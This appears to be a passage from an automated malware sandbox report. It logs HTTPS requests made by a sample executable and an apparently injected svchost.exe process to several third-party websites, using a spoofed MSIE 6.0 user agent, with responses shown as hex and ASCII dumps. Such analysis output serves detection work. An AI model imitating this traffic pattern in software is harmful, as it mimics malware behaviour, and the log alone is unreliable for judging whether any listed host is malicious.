                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17262INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                                          Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          105192.168.2.614944104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:08:00 UTC17197OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: orlyhotel.com
                                                                                                                                                                                                                                                                          Cookie: django_language=en
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17271INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:08:01 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 05:56:10 GMT
                                                                                                                                                                                                                                                                          Content-Language: en
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 05:56:10 GMT
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Vary: Accept-Language
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FuKv4lc2eUd1TviW2HRK5oKvw0v3Gkh2Pa7Q8heP8NWfK0sUXB52U%2B38bonXTQz9SdMuZ1DIv%2B4ZgIagWyB71PPcJUA0VurN9stml5QxXqSraxCyl11bSmkTBgsiI6iu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e54c8a79b1c-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17272INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                          2023-07-05 06:08:01 UTC17272INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          106192.168.2.617229185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:08:02 UTC17321OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:08:02 UTC17322INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:08:02 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:08:02 UTC17322INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          11192.168.2.650269188.114.96.7443C:\Users\user\Desktop\nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:10 UTC263OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.se
                                                                                                                                                                                                                                                                          2023-07-05 06:07:10 UTC263INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:10 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://hyab.com
                                                                                                                                                                                                                                                                          Cache-Control: max-age=600
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 06:17:10 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mh0gPfPrHA0xmkkW4wlWOSEPgUGh600zVYZMYRkYf3SKIFYBZjXMR%2F8iP5XC%2F9W%2BdYUuUwvCzjPNvh9iI%2FT2Ath%2BTdzkmOCmr%2BL%2B%2FsnU2eUC6FNI6opGPhYg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6d19bb59bb5c-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:10 UTC264INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:10 UTC264INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          12192.168.2.65024849.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:10 UTC264OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: nts-web.net
                                                                                                                                                                                                                                                                          2023-07-05 06:07:17 UTC339INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:17 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 2599149
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                          ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2023-07-05 06:07:17 UTC339INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                          2023-07-05 06:07:17 UTC355INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                          Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC371INData Raw: 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f
                                                                                                                                                                                                                                                                          Data Ascii: 2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC387INData Raw: 22 4d 37 32 33 2e 35 39 2c 32 37 30 2e 33 34 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: "M723.59,270.34a1.73,1.73,0,0,1-.78,2.24,2.53,2.53,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC403INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 34 2e 31 31 2c 33 33 38 2e 37 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 37 35 30 2c 33 34 30 61 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: s="cls-4" d="M754.11,338.72a1.72,1.72,0,0,1-.78,2.24A2.51,2.51,0,0,1,750,340a2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC419INData Raw: 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 31 2c 32 31 33 2e 32 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: .86"/><path class="cls-4" d="M771,213.21a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC435INData Raw: 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 35 35 2c 32 38 31 2e 35 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M801.55,281.59a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC451INData Raw: 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 32 2e 30 37 2c 33 35 30 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 5,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M832.07,350a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC467INData Raw: 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 39 2c 32 32 34 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 38 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: 41,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><path class="cls-4" d="M849,224.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.41,2.41,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M848.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:18 UTC483INData Raw: 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 35 2c 32 39 32 2e 38 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: 2,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M879.5,292.83a1.72,1.72,0,0,1-.77,2.24,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><pa
